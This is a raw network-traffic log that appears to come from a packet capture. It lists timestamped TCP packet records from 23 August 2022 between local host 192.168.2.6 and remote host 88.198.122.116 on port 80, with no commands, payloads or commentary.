                                                                                                                                                                      Aug 23, 2022 18:27:52.023823977 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023839951 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.023850918 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023868084 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.023876905 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023895025 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.023902893 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023925066 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.023927927 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023943901 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.023956060 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023967028 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.023982048 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.023996115 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024008036 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024023056 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024032116 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024049044 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024060011 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024084091 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024090052 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024110079 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024116993 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024130106 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024144888 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024156094 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024171114 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024183035 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024198055 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024210930 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024224997 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024240017 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024250984 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024260998 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024279118 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024288893 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024306059 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024317026 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024332047 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024343967 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024358988 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.024370909 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.024394989 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062166929 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062211037 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062235117 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062261105 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062268972 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062284946 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062295914 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062311888 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062311888 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062338114 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062340021 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062361956 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062365055 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062382936 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062393904 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062402964 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062419891 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062429905 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062446117 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062457085 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062474966 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062499046 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062500954 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062517881 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062530041 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062556028 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062563896 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062583923 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062585115 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062602043 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062608957 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062623024 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062634945 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062657118 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062660933 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062674999 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062688112 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062704086 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062714100 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062730074 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062740088 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062747955 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062766075 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062782049 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062789917 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062814951 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062817097 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062829971 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062843084 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062860966 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062868118 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062882900 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062894106 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062908888 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062918901 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062932968 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062946081 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062971115 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.062975883 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.062995911 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063010931 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063020945 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063033104 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063065052 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063091040 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063179970 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063241959 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063256025 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063278913 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063301086 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063307047 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063323021 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063334942 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063344955 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063376904 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063378096 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063405037 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063416004 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063431978 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063448906 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063457966 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063481092 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063483953 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063498020 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063509941 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063524961 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063534975 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063551903 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063559055 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063579082 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063589096 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063616037 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063618898 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063642979 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063643932 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063666105 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063672066 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063685894 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063697100 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063720942 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063733101 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063750029 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063757896 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063779116 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063780069 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063797951 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063807964 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063819885 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063832998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063853979 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063858032 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063879013 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063884020 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063909054 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063910961 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063940048 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063941002 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063965082 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063971043 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.063994884 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.063999891 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064018011 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064027071 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064053059 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064053059 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064080000 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064080954 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064100981 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064106941 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064121962 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064136982 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064148903 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064163923 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064179897 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064189911 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064208984 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064215899 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064234972 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064244032 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064260006 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064270973 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064287901 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064299107 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064311981 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064326048 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064341068 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064353943 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064372063 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064378023 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064404011 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064418077 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064429998 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064455986 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064459085 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064485073 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064495087 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064512014 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064533949 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064538002 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064567089 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064568043 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064594030 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064606905 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064620018 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064631939 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064646959 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064657927 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064676046 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064687967 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064703941 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064713955 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064733028 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064745903 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064762115 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064770937 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064785957 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064790964 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064815044 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064819098 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064841986 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064846992 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064862013 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064874887 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064883947 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064903975 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064918995 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064930916 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064949989 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064958096 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.064980030 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.064985991 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065002918 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065012932 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065032959 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065040112 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065063953 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065066099 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065090895 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065095901 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065115929 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065121889 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065146923 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065150976 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065177917 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065179110 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065206051 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065207958 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065229893 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065238953 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065267086 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065274954 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065294027 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065299988 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065323114 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065340042 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065351963 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065355062 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065381050 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065391064 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065408945 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065413952 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065437078 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065443993 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065464020 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065464020 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065493107 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065494061 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065521002 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065524101 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065548897 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065550089 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065578938 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065584898 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065608025 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065608025 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065635920 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065637112 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065666914 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065666914 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065687895 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065694094 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065721989 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065725088 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065752983 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065753937 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065781116 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065797091 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065808058 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065835953 CEST804994788.198.122.116192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:27:52.065836906 CEST4994780192.168.2.688.198.122.116
                                                                                                                                                                      Aug 23, 2022 18:27:52.065862894 CEST804994788.198.122.116192.168.2.6
